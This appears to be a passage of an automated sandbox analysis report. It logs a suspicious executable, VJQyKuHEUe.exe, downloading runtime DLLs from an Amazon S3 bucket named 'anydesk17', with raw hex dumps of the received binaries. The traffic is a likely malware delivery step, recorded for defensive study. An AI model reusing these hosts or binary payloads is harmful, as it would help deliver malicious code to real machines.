                                                                                              2024-12-18 12:05:54 UTC16384INData Raw: f7 96 b9 fe da f6 81 29 4e 15 60 56 76 63 d7 8e f3 f5 b1 33 9d e4 41 ca d1 d6 04 5e 0d d2 d4 6c f9 2b 21 6c 32 b6 c8 cf 5a 9c 9f de bf f8 a5 14 e8 be b8 96 ef 2b 29 ad c3 b3 54 97 e7 d0 33 6d 71 9b 94 0f 23 76 f1 93 aa 1e 24 3e ef e0 df 6e 9a b0 6c 1b f8 dd 24 82 7f ff fb df 2a cd 78 77 03 59 91 41 c9 ae 93 19 f1 24 99 36 72 23 e3 4b 7d f9 1b 1d ff 46 42 9f 7b 7e 10 ff f9 8b 90 23 7c e1 ff 64 fa 27 9a ff bb a3 1f f4 bc 48 eb 7f 86 ea 8a 45 f1 4f cd e5 f7 b4 f5 e6 6b 04 f8 92 ce 2f 64 e3 d3 e4 f2 ad e9 c5 22 22 e6 d6 df f5 da 5b f6 80 92 06 85 72 56 a5 da 7b fb 04 3f 23 99 44 38 da 13 31 43 d3 e2 5b 7b 83 22 b7 e6 d4 18 6c f1 23 cb 95 42 27 8d 97 28 ae 96 a5 c8 6f 16 47 f5 f7 29 f3 54 d1 ab 51 d3 ec 8c ba 2d 02 11 e8 b9 e5 e4 86 aa f5 a4 ac 10 bb 66 5e d8
                                                                                              Data Ascii: )N`Vvc3A^l+!l2Z+)T3mq#v$>nl$*xwYA$6r#K}FB{~#|d'HEOk/d""[rV{?#D81C[{"l#B'(oG)TQ-f^
                                                                                              2024-12-18 12:05:54 UTC1024INData Raw: 87 39 35 7c 6a 95 9a 44 c0 4f 71 0a 82 19 3f 2d 8b 47 12 8b 4e 1c 23 07 3f 58 0d ea 7e 8e ae 83 94 ef a0 a2 e4 ef 70 51 87 df 0f c5 d6 60 dc 3c ab 53 fb c4 79 b6 28 d4 37 26 a4 2a 81 d7 09 89 d1 0e c8 da ca 02 5d 66 7b ed b5 f7 e6 16 72 71 db fe 7e d0 12 68 e4 9e 15 9d 2a ff 9a 63 b8 b3 44 15 ad 92 99 04 0e 45 17 bc ec e4 a1 d7 64 5b ef 28 50 2e b9 ec 0e e5 b4 7d b2 bd 24 bd ef 90 73 ae b5 b7 31 54 3c 5e 5c 5a dd 57 00 aa 32 74 a8 ea f6 a8 ff ea 7c 6e d5 b8 20 7f fc 44 a1 dc 19 9d 0f 30 b4 88 28 a2 22 37 36 fb 5e 1e 5b 94 18 35 5c 91 64 cd 91 3a 54 d5 10 ba 9b cb 5f 11 95 55 25 48 c2 db 1c f0 e9 d4 8a 38 23 d9 43 21 8b fe 0d 50 e3 24 45 19 95 de ab 6e 9f 3b 41 54 85 14 af f4 67 09 1b 67 90 82 a2 43 b2 d3 5f 5f 71 df bf 0f 66 72 f1 cf ef e8 e4 fc b5 6d 6a
                                                                                              Data Ascii: 95|jDOq?-GN#?X~pQ`<Sy(7&*]f{rq~h*cDEd[(P.}$s1T<^\ZW2t|n D0("76^[5\d:T_U%H8#C!P$En;ATggC__qfrmj
                                                                                              2024-12-18 12:05:54 UTC16384INData Raw: 30 c4 40 93 ed c5 49 6e 5c 14 11 d3 d4 23 23 34 4a b8 41 24 2e 4e 51 e7 a1 ee c2 f5 0f ee 90 14 c8 1c fa 67 0e 97 32 ca 48 8e 80 4f a8 50 a7 3e 02 12 5d 15 73 e8 19 a2 13 07 17 f1 b1 01 1f 7c a3 64 53 49 fb f6 a4 28 b4 e7 68 c5 6c 67 29 87 c3 be 72 dd 8b 3c 4d 40 55 9d b2 11 62 4e b2 1e 10 d8 24 68 1e b4 18 12 7a 96 4d 2b 78 db c6 6d 7b c3 0d 7e b6 f3 98 a6 65 db 09 64 db 7e af 37 33 51 b8 e1 62 bc f1 0e 32 7b aa 52 7d 33 fe 47 5c a5 a6 f1 b1 97 2f 5c fc fc 0e cb 40 00 a4 b2 25 02 3d d6 f9 10 26 e1 92 d9 11 34 d0 c0 13 80 60 be dc 21 77 d6 b5 09 19 df 8f 44 7a 2c 86 7a 56 b9 84 4e e8 f4 3a 74 88 aa 0a 44 d4 74 f3 80 76 fa bd e3 78 01 42 f4 61 a7 ba 71 11 9d 0f 7c 87 8b a7 c4 4f c3 92 f6 dd bf b3 c8 3e c3 9f 9f ff f9 72 92 2c 3a 3e 9d 39 63 7b f6 30 d9 d9
                                                                                              Data Ascii: 0@In\##4JA$.NQg2HOP>]s|dSI(hlg)r<M@UbN$hzM+xm{~ed~73Qb2{R}3G\/\@%=&4`!wDz,zVN:tDtvxBaq|O>r,:>9c{0
                                                                                              2024-12-18 12:05:54 UTC1024INData Raw: a0 c6 d8 47 72 8f 13 1b c8 b2 1a b2 96 ed 1a 7d 00 db 99 cf ed 5f 3c 59 99 b8 2d dc 02 32 55 7d 7a d5 4d 4b 2f 7e 29 b9 a4 7c 7c 59 bb a3 f0 ec 93 10 d9 09 d4 ac e6 2b 44 05 ff 17 9e 18 01 70 4c 66 cb 6a 9c 84 fd 5c e2 48 48 e2 61 3a 5f 85 d5 14 13 61 ff d4 e1 88 43 3b 06 1e 03 3a 28 22 bf 44 dc 4c 1c e3 1f 5d 89 a1 1a cc 78 d9 e1 07 27 92 4e ff 24 87 e0 eb 4b 3c 97 43 88 5f 2e 28 e8 42 ed af c7 20 31 58 a6 d6 cc 7f 99 b3 e7 b3 7f 9e e7 49 9b 53 33 40 09 01 28 91 81 da db cc af 85 ce a9 fa 0d 1e 40 da 77 11 aa c4 90 8a 10 96 95 d1 fd 7e 17 0a 19 dc 1c 16 6c dc f9 72 66 fa a8 fa 86 d1 46 9c c0 77 6f 55 00 0a 88 9a 19 28 46 e1 21 f8 12 1e 03 c7 80 87 75 63 b6 3c 06 2f f6 99 4d 4d 14 54 a5 e7 85 7e 0a 0f ab 69 5f c0 53 b8 88 48 d5 ce 26 0b 15 95 93 b4 5f bf
                                                                                              Data Ascii: Gr}_<Y-2U}zMK/~)||Y+DpLfj\HHa:_aC;:("DL]x'N$K<C_.(B 1XIS3@(@w~lrfFwoU(F!uc</MMT~i_SH&_
                                                                                              2024-12-18 12:05:54 UTC1749INData Raw: 69 97 26 0e 56 0a 9b e2 cf fe 86 e6 cc f8 6e d4 65 a2 2c ff 34 36 1f aa 8b c0 5a 8e 81 00 3c 4f d8 8e 8b 1b 34 5d d1 87 d9 68 b3 1c b7 fb d0 87 54 6c 97 6f ff e9 65 bf 5d 62 21 62 e0 e2 79 9e 73 9e e7 b9 70 51 95 53 dc 85 d6 a3 d4 8b 8d 6c 3b 1e 82 48 e8 93 c4 50 f3 cb 24 fb 5a 50 35 e8 92 4f 80 5c 65 fe 49 66 5c 02 d2 fb 23 7c 11 d7 9b c8 ba 8d 62 b0 63 3c 52 d9 75 6b 3c f4 a1 e7 3c ce af 63 9e 53 64 1c bf 7e f9 27 ae 66 3d 46 ec 52 85 5c 62 db 4a 4c a9 6d fd 7f e1 62 fa 4a 34 59 d3 84 f4 0c 85 0d 11 d1 b4 45 70 38 f7 a7 40 06 e5 90 91 ba 66 08 71 c2 cd dc d2 27 ce ad 64 67 fa a9 7a e9 8e 8b 79 4e 66 f1 6a f7 57 08 55 5c 4f b7 29 16 cf 5e 36 12 4b 0c 6a 95 0e b3 b3 76 d4 02 17 d5 74 00 f6 78 c8 63 8c 41 19 f0 64 54 a3 70 d1 87 6a 64 38 82 38 bd 1d 5e 2f
                                                                                              Data Ascii: i&Vne,46Z<O4]hTloe]b!byspQSl;HP$ZP5O\eIf\#|bc<Ruk<<cSd~'f=FR\bJLmbJ4YEp8@fq'dgzyNfjWU\O)^6KjvtxcAdTpjd88^/
                                                                                              2024-12-18 12:05:54 UTC16384INData Raw: 1e c7 21 0f 71 70 8c f4 bf f0 b5 e2 0c 09 4c 99 20 5a e2 72 4d 53 83 a9 4d 77 09 5c 74 85 6b 85 25 f0 79 b6 23 77 63 83 32 9a 50 58 12 8a a8 0c 85 12 b3 a0 c5 cc 8c a6 ac 05 e0 d0 3f 68 c2 49 78 c0 2c 0b f4 2f d9 96 5b b1 79 9d 65 f9 b0 6c 02 63 d7 63 7b 97 c9 64 ad b4 b3 a2 0d a6 fd a5 be 21 0a e3 b3 cd c0 8a f8 93 a4 65 30 62 4e 25 74 62 46 d2 2e 13 01 8e 88 7b 1f fe 5c 19 68 37 1c 58 34 73 81 d1 7a 30 7c a4 90 66 bd 71 2a 01 d8 a1 7f cf d8 3c 1e e3 f8 f5 35 8e 21 6a 60 1a 66 9d 9f 34 d7 25 0f 6b 60 ee c9 4f 51 3f 7b b1 d0 3d e3 aa ef 52 6b d2 ab 71 50 4a 5f 4c 7d 32 e3 6f a4 81 76 08 06 cd cf 5c 59 4c 9c ba 4b 93 e9 8c e1 cb 51 4f 99 c5 00 0c 91 14 67 98 51 d2 82 79 38 aa 9c 16 a1 0a 35 87 a7 96 a3 e6 6e ad 33 12 cb bf 9e 11 ce 2a e4 56 90 aa 34 d3 e9
                                                                                              Data Ascii: !qpL ZrMSMw\tk%y#wc2PX?hIx,/[yelcc{d!e0bN%tbF.{\h7X4sz0|fq*<5!j`f4%k`OQ?{=RkqPJ_L}2ov\YLKQOgQy85n3*V4
                                                                                              2024-12-18 12:05:54 UTC1024INData Raw: 53 d8 c7 91 f9 0d c1 e2 a2 6e b5 7f 91 0f cd 43 19 7a 65 9d 51 12 32 5e 06 3e 6f e1 88 ff 36 40 ba 70 57 f2 be b5 a8 74 7f a1 c4 e2 99 6f 2e 69 03 74 a7 1b d5 c5 21 3a 08 f5 d7 f8 5e 5f dc d4 d6 2b 6f 05 10 59 cc 5f d1 6b 7c 7a 29 ff 32 9d cc dd b2 4b c3 3a 2e 72 f9 1d 74 6e 9e f3 0b 5f ba 41 75 32 58 a6 57 5a 45 62 7c cf f4 b3 91 97 be 67 a7 e9 4c ac 8c b1 c4 6b 05 ee 23 99 76 f0 ab 27 5d f6 b2 fd cd 4f 0d fe 7c dd f9 c0 6f ad 9f 57 9f d7 a3 4f 6d 59 cb 7f b3 9e fb 7d 9c 82 b2 b5 29 97 1c dc 56 df 3d 9a ce e0 97 08 f9 18 22 c7 43 1e 5f 8f 7f fd eb 3c cf a9 aa 5f 8f c3 43 c3 1c c7 f8 fa 7a 7c 1d 8f 63 1c e3 18 87 27 1e 87 a9 06 c1 b0 52 b1 b2 d9 b7 dc da f5 bf d9 7b b3 2d 49 72 1c 4b f0 02 a4 a8 99 7b 44 4d ff ff 07 f6 39 f5 34 35 3d a7 32 dd 4d 55 08 f4
                                                                                              Data Ascii: SnCzeQ2^>o6@pWto.it!:^_+oY_k|z)2K:.rtn_Au2XWZEb|gLk#v']O|oWOmY})V="C_<_Cz|c'R{-IrK{DM945=2MU
                                                                                              2024-12-18 12:05:54 UTC16384INData Raw: 78 c5 8a 0d 2b 2a bd 1f 94 96 90 fb 77 89 dc 8e cf 11 05 02 93 32 12 c1 4e cd 89 6d 37 b5 37 d0 32 b7 5a ab 25 33 26 9a 4a e4 54 d6 7a 10 94 32 b3 f2 ec 29 5b 29 45 b4 1c bf 73 2d 02 90 a8 32 04 05 e7 3a 06 8c 2e 6e be cb d8 7b f7 2f 2d 46 94 cf 62 6e 9a 0d f5 88 e0 3e 90 d0 f0 6c 42 bb 9a e6 87 56 95 e2 eb 6a 68 72 14 0b 50 3e 7e 5f 93 78 36 5e d9 7f a7 bb e6 46 34 61 82 08 10 68 f1 72 a0 bd 23 13 05 40 0c 96 ee 3c 9a 9f b6 85 9a 21 d4 2c aa 14 5a ef 74 02 99 53 b2 ec e6 74 a8 1a e2 72 8b 00 d6 75 d5 a1 d7 7c 93 a8 a6 ec 37 f9 dc d7 f3 54 5e 76 95 f1 0f 35 ff d6 0a fe c8 4d 7d e6 40 03 cf 6d 96 39 f2 92 f7 5c d3 75 fd 34 0f 43 7f 17 f3 9a d1 4e aa b0 73 fd c6 28 99 11 4a a0 32 e6 ea 39 16 23 8e 0c bb 5a fe ac 68 6e 87 b4 59 43 33 6b 4e 29 65 56 1e 42 b9
                                                                                              Data Ascii: x+*w2Nm772Z%3&JTz2)[)Es-2:.n{/-Fbn>lBVjhrP>~_x6^F4ahr#@<!,ZtStru|7T^v5M}@m9\u4CNs(J29#ZhnYC3kN)eVB


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.5497223.5.238.1834431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:05:57 UTC78OUTGET /VCRUNTIME140.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:05:58 UTC446INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: 93nUhUrn3BFNvBZk1lw5sMYsxMwwh+G2dSpVH1hf9Yncga5IzIFNWtRhMPT0w0WEAJ8P4qKyj09pShP8qb0lQsngup8cQ4Ll
                                                                                              x-amz-request-id: NYCQTQ6YQG88YKE0
                                                                                              Date: Wed, 18 Dec 2024 12:05:59 GMT
                                                                                              Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                              ETag: "e9b690fbe5c4b96871214379659dd928"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 119376
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:05:58 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 4e 0d a3 8c 2f 63 f0 8c 2f 63 f0 8c 2f 63 f0 5f 5d 62 f1 8e 2f 63 f0 85 57 f0 f0 87 2f 63 f0 8c 2f 62 f0 a1 2f 63 f0 8c 2f 63 f0 8d 2f 63 f0 8a ae 60 f1 99 2f 63 f0 8a ae 67 f1 9c 2f 63 f0 8a ae 66 f1 93 2f 63 f0 8a ae 63 f1 8d 2f 63 f0 8a ae 9c f0 8d 2f 63 f0 8a ae 61 f1 8d 2f 63 f0 52 69 63 68 8c 2f 63 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N/c/c/c_]b/cW/c/b/c/c/c`/cg/cf/cc/c/ca/cRich/c
                                                                                              2024-12-18 12:05:58 UTC578INData Raw: 48 89 5c 24 08 57 48 83 ec 20 48 8d 05 47 e8 00 00 48 8b f9 48 89 01 8b da 48 83 c1 08 e8 de 1c 00 00 f6 c3 01 74 0d ba 18 00 00 00 48 8b cf e8 e8 bb 00 00 48 8b 5c 24 30 48 8b c7 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 48 8b f9 45 33 ff 44 89 7c 24 20 44 21 bc 24 b0 00 00 00 4c 21 7c 24 28 4c 21 bc 24 c8 00 00 00 e8 c3 21 00 00 4c 8b 68 28 4c 89 6c 24 40 e8 b5 21 00 00 48 8b 40 20 48 89 84 24 c0 00 00 00 48 8b 77 50 48 89 b4 24 b8 00 00 00 48 8b 47 48 48 89 44 24 30 48 8b 5f 40 48 8b 47 30 48 89 44 24 48 4c 8b 77 28 4c 89 74 24 50 48 8b cb e8 ae d4 ff ff e8 71 21 00 00 48 89 70 20 e8 68 21 00 00 48 89 58 28 e8 5f 21 00 00 48 8b 50 20 48 8b 52 28 48 8d 4c 24 60 e8 45 b6 00 00 4c 8b e0 48
                                                                                              Data Ascii: H\$WH HGHHHtHH\$0HH _@SVWATAUAVAWHpHE3D|$ D!$L!|$(L!$!Lh(Ll$@!H@ H$HwPH$HGHHD$0H_@HG0HD$HLw(Lt$PHq!Hp h!HX(_!HP HR(HL$`ELH
                                                                                              2024-12-18 12:05:58 UTC16384INData Raw: c4 53 56 57 41 54 41 55 41 57 48 81 ec a8 00 00 00 48 8b f9 45 33 e4 44 89 64 24 20 44 21 a4 24 f0 00 00 00 4c 21 64 24 28 4c 21 64 24 40 44 88 60 80 44 21 60 84 44 21 60 88 44 21 60 8c 44 21 60 90 44 21 60 94 e8 bb 1f 00 00 48 8b 40 28 48 89 44 24 38 e8 ad 1f 00 00 48 8b 40 20 48 89 44 24 30 48 8b 77 50 48 89 b4 24 f8 00 00 00 48 8b 5f 40 48 8b 47 30 48 89 44 24 50 4c 8b 7f 28 48 8b 47 48 48 89 44 24 70 48 8b 47 68 48 89 44 24 78 8b 47 78 89 84 24 e8 00 00 00 8b 47 38 89 84 24 e0 00 00 00 48 8b cb e8 91 d2 ff ff e8 54 1f 00 00 48 89 70 20 e8 4b 1f 00 00 48 89 58 28 e8 42 1f 00 00 48 8b 50 20 48 8b 52 28 48 8d 8c 24 88 00 00 00 e8 25 b4 00 00 4c 8b e8 48 89 44 24 48 4c 39 67 58 74 19 c7 84 24 f0 00 00 00 01 00 00 00 e8 0f 1f 00 00 48 8b 48 70 48 89 4c 24
                                                                                              Data Ascii: SVWATAUAWHHE3Dd$ D!$L!d$(L!d$@D`D!`D!`D!`D!`D!`H@(HD$8H@ HD$0HwPH$H_@HG0HD$PL(HGHHD$pHGhHD$xGx$G8$HTHp KHX(BHP HR(H$%LHD$HL9gXt$HHpHL$
                                                                                              2024-12-18 12:05:58 UTC1024INData Raw: 0d 41 f5 00 00 83 39 09 74 0a 48 8d 54 24 30 e8 a6 ed ff ff 48 8d 54 24 30 48 8b cb e8 7d ec ff ff 48 39 3d 36 f5 00 00 75 0c 83 63 08 00 48 83 23 00 c6 43 08 02 8a 4b 08 84 c9 0f 84 da fe ff ff eb 27 80 7b 08 01 7f 21 48 83 3b 00 48 8b cb 74 0e 48 8d 15 95 bc 00 00 e8 90 e5 ff ff eb 0a ba 01 00 00 00 e8 94 ea ff ff 48 8b 74 24 68 48 8b c3 48 8b 5c 24 60 48 83 c4 50 5f c3 cc 48 89 5c 24 08 55 48 8b ec 48 83 ec 40 48 8b 05 cc f4 00 00 48 8b d9 80 38 58 0f 84 ef 00 00 00 80 38 5a 0f 84 a9 00 00 00 48 8d 4d e0 e8 4a fe ff ff 8b 4d e8 33 d2 84 c9 0f 85 87 00 00 00 48 8b 05 9a f4 00 00 38 10 74 7c 80 38 40 74 6d 80 38 5a 74 0f 89 53 08 c6 43 08 02 48 89 13 e9 da 00 00 00 48 ff c0 4c 8d 45 f0 48 89 05 6f f4 00 00 8b 05 79 f4 00 00 c1 e8 12 f7 d0 a8 01 74 10 48
                                                                                              Data Ascii: A9tHT$0HT$0H}H9=6ucH#CK'{!H;HtHHt$hHH\$`HP_H\$UHH@HH8X8ZHMJM3H8t|8@tm8ZtSCHHLEHoytH
                                                                                              2024-12-18 12:05:58 UTC16384INData Raw: 4c 89 7d e7 48 8d 4d e7 44 89 7d ef 48 8b d8 e8 06 fa ff ff 4c 8b c3 48 8d 55 07 48 8d 4d e7 e8 76 e7 ff ff 41 b0 5d 48 8d 55 27 48 8d 4d 07 e8 92 e7 ff ff 48 8b d0 48 8d 4d d7 e8 5e e8 ff ff 80 7d df 01 7e 99 4c 39 3f 74 62 f7 47 08 00 08 00 00 74 09 48 8d 55 27 48 8b cf eb 3a b2 28 4c 89 7d e7 48 8d 4d e7 44 89 7d ef e8 aa f9 ff ff 4c 8b c7 48 8d 55 07 48 8d 4d e7 e8 1a e7 ff ff 41 b0 29 48 8d 55 27 48 8d 4d 07 e8 36 e7 ff ff 48 8d 55 17 48 8b c8 4c 8d 45 d7 e8 fa e6 ff ff 48 8b 08 48 89 4d d7 8b 40 08 89 45 df 48 8d 55 d7 48 8d 4d f7 e8 54 32 00 00 8b 4d ff 48 8b 45 f7 0f ba e9 0b 41 89 4e 08 49 89 06 e9 a0 00 00 00 48 8d 4d e7 4c 89 7d e7 44 89 7d ef 4c 39 3a 74 5b b2 28 e8 31 f9 ff ff 4c 8b c7 48 8d 55 d7 48 8d 4d e7 e8 a1 e6 ff ff 48 8d 05 ee b5 00
                                                                                              Data Ascii: L}HMD}HLHUHMvA]HU'HMHHM^}~L9?tbGtHU'H:(L}HMD}LHUHMA)HU'HM6HUHLEHHM@EHUHMT2MHEANIHML}D}L9:t[(1LHUHMH
                                                                                              2024-12-18 12:05:58 UTC1024INData Raw: 30 e8 68 a7 ff ff 4c 8b c7 48 8d 55 20 48 8b c8 e8 85 a7 ff ff 48 8b 08 48 89 0f 8b 40 08 89 47 08 4c 8d 9c 24 40 02 00 00 48 8b c7 49 8b 5b 20 49 8b 73 28 49 8b 7b 30 49 8b e3 41 5e 41 5d 5d c3 cc 48 89 5c 24 08 4c 89 74 24 10 55 48 8b ec 48 83 ec 70 48 83 21 00 48 8b d9 83 61 08 00 45 33 c0 48 8d 4d c0 b2 01 e8 15 1b 00 00 4c 8d 35 ea 71 00 00 48 8b 10 48 89 13 48 8b ca 8b 40 08 89 43 08 80 7b 08 00 48 8b 05 d0 b0 00 00 75 59 80 38 00 74 54 80 38 40 74 54 48 8d 4d d0 e8 e7 fa ff ff 4c 89 75 b0 4c 8d 45 c0 c7 45 b8 02 00 00 00 48 8d 55 e0 0f 28 45 b0 48 8b c8 66 0f 7f 45 c0 e8 a7 a6 ff ff 4c 8b c3 48 8d 55 f0 48 8b c8 e8 c4 a6 ff ff 48 8b 08 48 89 0b 8b 40 08 89 43 08 48 8b 05 75 b0 00 00 80 38 40 75 0c 48 ff c0 48 89 05 66 b0 00 00 eb 74 80 38 00 74 0e
                                                                                              Data Ascii: 0hLHU HHH@GL$@HI[ Is(I{0IA^A]]H\$Lt$UHHpH!HaE3HML5qHHH@C{HuY8tT8@tTHMLuLEEHU(EHfELHUHHH@CHu8@uHHft8t
                                                                                              2024-12-18 12:05:58 UTC1749INData Raw: ad 00 00 83 63 08 00 48 8d 05 e0 74 00 00 48 89 03 eb 27 48 ff c0 48 89 05 41 ad 00 00 48 8b 44 24 20 48 89 03 8b 44 24 28 89 43 08 eb 0c 83 63 08 00 48 83 23 00 c6 43 08 02 48 8b c3 48 83 c4 40 5b c3 cc cc cc 40 53 48 83 ec 30 48 8b d9 48 8b 0d 08 ad 00 00 80 39 00 75 10 83 63 08 00 48 8d 05 88 74 00 00 48 89 03 eb 62 41 b8 04 00 00 00 48 8d 15 6a 6e 00 00 ff 15 c0 5a 00 00 85 c0 75 3f 48 83 05 d4 ac 00 00 04 44 8d 40 01 33 d2 48 8d 4c 24 20 e8 9c fe ff ff 48 8b 05 bd ac 00 00 80 38 40 75 1b 48 ff c0 48 89 05 ae ac 00 00 48 8b 44 24 20 48 89 03 8b 44 24 28 89 43 08 eb 0c 83 63 08 00 48 83 23 00 c6 43 08 02 48 8b c3 48 83 c4 30 5b c3 40 53 48 83 ec 20 48 8b 05 7b ac 00 00 48 8b d9 80 38 3f 75 24 48 ff c0 80 38 24 75 09 b2 01 e8 48 02 00 00 eb 1d 45 33 c0
                                                                                              Data Ascii: cHtH'HHAHD$ HD$(CcH#CHH@[@SH0HH9ucHtHbAHjnZu?HD@3HL$ H8@uHHHD$ HD$(CcH#CHH0[@SH H{H8?u$H8$uHE3
                                                                                              2024-12-18 12:05:59 UTC16384INData Raw: 66 0f 7f 45 b0 e8 5f 99 ff ff e9 10 03 00 00 b2 26 4c 89 75 e0 48 8d 4d e0 44 89 75 e8 e8 23 af ff ff 48 8d 4d b0 e8 0a c9 ff ff 4c 8b c0 48 8d 4d e0 48 8b d7 e8 8b 9c ff ff e9 e0 02 00 00 48 8b cf e8 6a f6 ff ff e9 d3 02 00 00 48 8d 05 c6 6d 00 00 44 89 77 08 48 89 07 e9 c0 02 00 00 48 8b cf e8 5a db ff ff e9 b3 02 00 00 8b ce 83 e9 37 74 53 83 e9 01 74 41 83 e9 09 74 2d 83 e9 01 74 28 83 e9 01 74 16 83 f9 02 0f 85 84 02 00 00 48 8b cf e8 9d c8 ff ff e9 82 02 00 00 48 8b cf e8 50 b2 ff ff e9 75 02 00 00 8b d6 48 8b cf e8 61 d3 ff ff e9 66 02 00 00 48 8b cf e8 80 e6 ff ff e9 59 02 00 00 48 8b cf e8 3f 0a 00 00 e9 4c 02 00 00 83 fe 50 0f 8f 18 02 00 00 0f 84 f4 01 00 00 8b ce 83 e9 47 74 50 83 e9 01 74 4b 83 e9 01 74 46 83 e9 01 74 41 83 e9 03 74 1c 83 f9
                                                                                              Data Ascii: fE_&LuHMDu#HMLHMHHjHmDwHHZ7tStAt-t(tHHPuHafHYH?LPGtPtKtFtAt
                                                                                              2024-12-18 12:05:59 UTC1024INData Raw: e8 34 0d ff ff 90 48 83 c4 20 5d c3 cc 40 55 48 83 ec 20 48 8b ea e8 16 51 ff ff 83 78 30 00 7e 08 e8 0b 51 ff ff ff 48 30 48 83 c4 20 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 fb 0c ff ff 90 48 83 c4 30 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 dd 50 ff ff 83 78 30 00 7e 08 e8 d2 50 ff ff ff 48 30 48 83 c4 30 5d c3 cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 38 e8 6a e6 ff ff 90 48 83 c4 20 5d c3 cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 20 5d c3 cc 40 55 48 83 ec 30 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 30 5d c3 cc 48 8d 8a 70 00 00 00 e9 20 5b ff ff 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 bb 4f ff ff cc 40 53 55 57 48 83 ec 40 48 8b ea 48 89 4d 50 48 89 4d 48 e8
                                                                                              Data Ascii: 4H ]@UH HQx0~QH0H ]@UH0HH0]@UH0HPx0~PH0H0]@UH HHM8jH ]@UH HH38H ]@UH0HH38H0]Hp [@UH H3H ]O@SUWH@HHMPHMH
                                                                                              2024-12-18 12:05:59 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                              Data Ascii:


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.5497313.5.239.1464431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:06:01 UTC80OUTGET /vcruntime140_1.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:06:01 UTC445INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: v2OfH5p0YHPAOx9KrQh2/x/Zi0gKfb/6vH3zqr6C6DU9YyOYTkIThmmrZwdIViTRjgqfiDISOWlbHF2txE/ZrYVtnO7Nl9kS
                                                                                              x-amz-request-id: VKC41TPQQYCDH9DT
                                                                                              Date: Wed, 18 Dec 2024 12:06:02 GMT
                                                                                              Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                              ETag: "eb49c1d33b41eb49dfed58aafa9b9a8f"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 49744
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:06:01 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 39 40 b7 57 7d 21 d9 04 7d 21 d9 04 7d 21 d9 04 ae 53 d8 05 7f 21 d9 04 7b a0 d8 05 7f 21 d9 04 74 59 4a 04 76 21 d9 04 7d 21 d8 04 4e 21 d9 04 7b a0 da 05 78 21 d9 04 7b a0 dd 05 7a 21 d9 04 7b a0 dc 05 66 21 d9 04 7b a0 d9 05 7c 21 d9 04 7b a0 26 04 7c 21 d9 04 7b a0 db 05 7c 21 d9 04 52 69 63 68 7d 21 d9 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 